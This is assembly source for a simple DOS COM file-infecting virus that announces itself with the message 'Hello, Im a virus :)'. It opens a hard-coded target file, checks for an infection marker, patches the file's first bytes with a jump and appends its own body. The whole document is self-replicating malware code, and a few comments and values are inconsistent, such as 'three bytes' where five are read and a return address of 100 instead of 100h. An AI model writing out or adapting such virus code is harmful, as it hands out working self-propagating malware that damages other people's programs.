org	100h		; COM files always starts at 100h

	;; a five bytes long program (a simple jump instruction)
	;; act as a placeholder for a real infected COM file for now 
program:
	jmp	start		; jump 0 steps ahead
infect: db	13h, 37h	; mark to say we already have the virus

	;; trick to get the relative start address
start:	call	main
main:
	pop     bp		; callers offset is stored on the stack
	sub     bp, main	; calculate the real offset
	
	;; restore the original first five bytes
        lea     si, [bp+bytes]	; set source index
        mov     di, 100h	; set destination index
	movsw			; copy a word (two bytes)
	movsw
        movsb			; copy a byte
	
	;; find file to infect
        call	search		
	
	;;  open file
        mov     ax,3d02h        ; open read/write 
        int     21h             ; call function
	jc	jump		; jump if error
	xchg    ax, bx	; put file handle into bx

	;; read first three bytes of the file and store them for later
	mov     ah, 3fh		; file read function
        lea     dx, [bp+bytes]	; buffer to read into
        mov     cx, 5		; number of bytes to read
        int     21h		; call function

	;; check for earlier infection
	lea 	si, [bp + sig1]	; set source index
	lea	di, [bp + sig]	; set destination index
	cmpsw			; compare word
	jz	jump		; quit if equal

	mov	al, 2		; move to end of file
	call	move		; call subroutine
	sub     ax, 3 		; filesize - 3
	mov     [bp+addr], ax	; store size

	;; write 'jump to virus' intruction in COM file
	mov	al, 0		; move to beginning of file
	call	move		; call subrutine
	mov     ah, 40h		; write function
        mov     cx, 5		; number of bytes to write
        lea     dx,[bp+hexjmp]	; buffer to write
        int     21h		; call function

	;; write virus to the end of the COM file
	mov	al, 2		; move to end of file
	call	move		; call subroutine
	mov     ah, 40h		; write function
        mov     cx, end-start	; number of bytes to write
        lea     dx, [bp+start]	; buffer to write
        int     21h		; call function

	;; close the file
        mov     ah, 3eh		; close file function
        int     21h		; call the function

jump:
	;; do other fun stuff
	mov    	ah,09		; print function
	lea    	dx, [bp + msg] 	; message buffer
	int    	21h		; call function

	mov di,100		; set return address 
	push di			; push it in the stack
	ret			; return to caller (at 100h)
	
	;; Search function goes here 
search:	
	lea     dx,[bp + fname] ; load filename	buffer into dx
	ret			; return to caller
        fname db 'HELLO.COM',0	; File to infect	

	;; Move file pointer (bof: al=0, eof: al=2)
move:
	mov	ah, 42h		; move file pointer function
	xor	cx, cx		; offset high (cx = 0)
	xor	dx, dx		; offset low (dx = 0)
	int	21h		; call function
	ret			; return to caller

hexjmp:	db	0e9h		; Jump intruction as hex
addr:	dw	0		; Address to jump to
sig:	db 	13h, 37h	; l33t

;; Three bytes to store from COM file
;; for now it holds "INT 20h" meaning "quit program"
bytes:	db	0cdh, 20h, 0
sig1:	db	0, 0
msg:	db 'Hello, Im a virus :)',0Dh,0Ah,'$' 	
end:	nop			; virus ends here